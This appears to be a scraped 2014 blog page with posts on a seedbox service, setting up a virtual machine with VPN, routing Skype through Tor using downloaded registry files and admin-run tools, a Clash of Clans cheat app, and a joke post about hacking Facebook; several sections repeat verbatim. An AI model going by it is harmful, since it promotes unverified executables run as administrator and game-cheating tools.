I only have one seedbox to talk about, I have used several, and this is the only one that gave me no issues. The seedbox is UnderLeech and you can get one for $16 a month. They accept Bitcoin for added security. It comes with a VPN setup so you can choose t0 download it from your secure encrypted as well.
Basic Setup Virtual Machine + VPN
Setup Virtual Machine + VPN
Have you ever wanted to use two PC's with two different IP addresses? Well now I will show you how. A VM, or Virtual machine is a virtual computer, on your own computer.
Why would you want such a thing? Well, you could use it for malware testing, double your VPN's for extra security etc.
Things we will need:
1. VMware - http://www.softpedia.com/get/System/OS-E...tion.shtml
2. .ISO of the OS you want to install, a .iso is a virtual disk. For this tutorial I will be using Windows.
3. OpenVPN - http://swupdate.openvpn.org/community/re...nstall.exe
4. VPN of choice, if you need one check here: http://www.anonware.net/index.php?page=vpn
Once VMware is installed, move to the instructions.
How to set up VM + VPN in VMware
1. Go to file, then new virtual machine or push CTRL+N.
2. When it asks where to install, find the .iso file.
3. Fill out location details.
4. Chose hardware setting in the tab before the install. I suggest using only what Ram you can spare, and all of your processor power.
5. Hit install, and wait for it to install.
Setup of OpenVPN
1.Now that VMware is installed install OpenVPN on the desktop of your VM. Make sure TAP/Tun drivers get installed or it will not work.
2. Open install directory, and drag and drop the files you got with your VPN. If you bought anything that uses OpenVPN you will see this.
3. Then right click on the OpenVPN gui in the hidden icons of your notification bar and hit connect and you are done after entering your username and password!
Why would you want such a thing? Well, you could use it for malware testing, double your VPN's for extra security etc.
Things we will need:
1. VMware - http://www.softpedia.com/get/System/OS-E...tion.shtml
2. .ISO of the OS you want to install, a .iso is a virtual disk. For this tutorial I will be using Windows.
3. OpenVPN - http://swupdate.openvpn.org/community/re...nstall.exe
4. VPN of choice, if you need one check here: http://www.anonware.net/index.php?page=vpn
Once VMware is installed, move to the instructions.
How to set up VM + VPN in VMware
1. Go to file, then new virtual machine or push CTRL+N.
2. When it asks where to install, find the .iso file.
3. Fill out location details.
4. Chose hardware setting in the tab before the install. I suggest using only what Ram you can spare, and all of your processor power.
5. Hit install, and wait for it to install.
Setup of OpenVPN
1.Now that VMware is installed install OpenVPN on the desktop of your VM. Make sure TAP/Tun drivers get installed or it will not work.
2. Open install directory, and drag and drop the files you got with your VPN. If you bought anything that uses OpenVPN you will see this.
3. Then right click on the OpenVPN gui in the hidden icons of your notification bar and hit connect and you are done after entering your username and password!
Setup of PPTP VPN
1. Get a PPTP VPN, for practice sake, and just for browsing check out VPNbook. For more advanced security I recommend 143VPN for OpenVPN and PPTP connections.
2. Get server information.
![[Image: yHJNvZ4.png]](http://i.imgur.com/yHJNvZ4.png)
3. Go to control panel, networking and internet options then setup new network and internet connection.
![[Image: SpimuZ5.png]](http://i.imgur.com/SpimuZ5.png)
4. Connect to a workplace to set up VPN.
![[Image: RKUIidq.png]](http://i.imgur.com/RKUIidq.png)
5. Use my internet connection.
![[Image: TNreV85.png]](http://i.imgur.com/TNreV85.png)
6. You will see this screen, add login details to it.
![[Image: FvGJ0OI.png]](http://i.imgur.com/FvGJ0OI.png)
![[Image: bCmN1y6.png]](http://i.imgur.com/bCmN1y6.png)
7. If entered correctly it will connect,
![[Image: r5cjsfA.png]](http://i.imgur.com/r5cjsfA.png)
and look like this in your network bar when finished:
![[Image: qDsifMr.png]](http://i.imgur.com/qDsifMr.png)
1. Get a PPTP VPN, for practice sake, and just for browsing check out VPNbook. For more advanced security I recommend 143VPN for OpenVPN and PPTP connections.
2. Get server information.
3. Go to control panel, networking and internet options then setup new network and internet connection.
4. Connect to a workplace to set up VPN.
5. Use my internet connection.
6. You will see this screen, add login details to it.
7. If entered correctly it will connect,
and look like this in your network bar when finished:
Tuesday, August 12, 2014
Use the Tor Anonymous Network to anonymize Skype
Before we begin, you will need:
Steps:
Navigate to https://dl.dropboxusercontent.com/u/33446/twitch/skype.html
Select the check mark that says SOCKS5 and in the host box type 127.0.0.1 and in the port box type 9050
Download the file and save it to your desktop. Now Download the Skype Firewall Blocker, ADVOR andthe fresh install of Skype if you haven't done so already. To make sure you uninstalled any previous Skype installs, use GeekUninstaller.
Extract ADVOR.
Install Skype and don't run it yet. Close it. Now run the Skype Firewall blocker.
Right click the SkypeProxySettings registry file and click merge. When asked to confirm click yes.
Reboot your PC.
After you have rebooted open the ADVOR folder and run ADVOR as an administrator. Once opened click the connect button to start the relay.
ADVOR should now be started and running.
Start Skype and login with your fresh account. It may be slow to login at first but it will finish and you will be online.
If Skype fails to login then please navigate to the new identity tab as seen here:
Select a new country and a new node. Just so you know the U.S. works best and is the fastes generally.
You can check your Skype is now using a new IP by navigating to http://skidresolve.com/ and entering in your Skype name.
The IP should be a TOR exit router as shown below. If it is not, please follow the steps again.
Now whenever you want to use Skype simply launch ADVOR, connect, and you are safe and secure.
- ADVOR
- New Skype Install - Use a new Skype account as well, as resolvers may already have your skype IP resolved and saved.
- Skype Firewall Blocker
Steps:
Navigate to https://dl.dropboxusercontent.com/u/33446/twitch/skype.html
Select the check mark that says SOCKS5 and in the host box type 127.0.0.1 and in the port box type 9050
Download the file and save it to your desktop. Now Download the Skype Firewall Blocker, ADVOR andthe fresh install of Skype if you haven't done so already. To make sure you uninstalled any previous Skype installs, use GeekUninstaller.
Extract ADVOR.
Install Skype and don't run it yet. Close it. Now run the Skype Firewall blocker.
Right click the SkypeProxySettings registry file and click merge. When asked to confirm click yes.
Reboot your PC.
After you have rebooted open the ADVOR folder and run ADVOR as an administrator. Once opened click the connect button to start the relay.
ADVOR should now be started and running.
Start Skype and login with your fresh account. It may be slow to login at first but it will finish and you will be online.
If Skype fails to login then please navigate to the new identity tab as seen here:
Select a new country and a new node. Just so you know the U.S. works best and is the fastes generally.
You can check your Skype is now using a new IP by navigating to http://skidresolve.com/ and entering in your Skype name.
The IP should be a TOR exit router as shown below. If it is not, please follow the steps again.
Now whenever you want to use Skype simply launch ADVOR, connect, and you are safe and secure.
Friday, August 1, 2014
Hack Clash of Clans on Android
Today I stumbled upon a Clash of clans cheat that is amazing. I have seen this for iOS before, however I have never seen it for Android. The Clash of Clans Android Game Assistant will allow you to do a few very awesome and helpful cheats in Clash of Clans, such as:
- Stay always online in Clash of clans so your base cannot be raided.
- Search for a minimum of a resource such as Gold, Elixer and Dark Elixer in a battle.
- When searching for battles with your preset amount of resources it will automatically and quickly look for more loot if the critera has not been met.
- Sandbox attack, fight friends and anyone else without actually fighting them! Just to see if you would win and for practice.Screenshots:
The app itself:
The user interface:
[metaslider id=63]
The app that allows you to exploit Clash of Clans is called xmodgames and can be downloaded on the Google Play store for free.
https://play.google.com/store/apps/details?id=com.xmodgame&hl=en
Sunday, July 27, 2014
How to hack Facebook.
The steps you will need to take to Hack mega corporation Facebook are so advanced you will not find them in a guide. In all honesty you should turn back, unless you wish to fight many legal battles for sheer stupidity. Anyways, this is a test post.
Subscribe to:
Posts (Atom)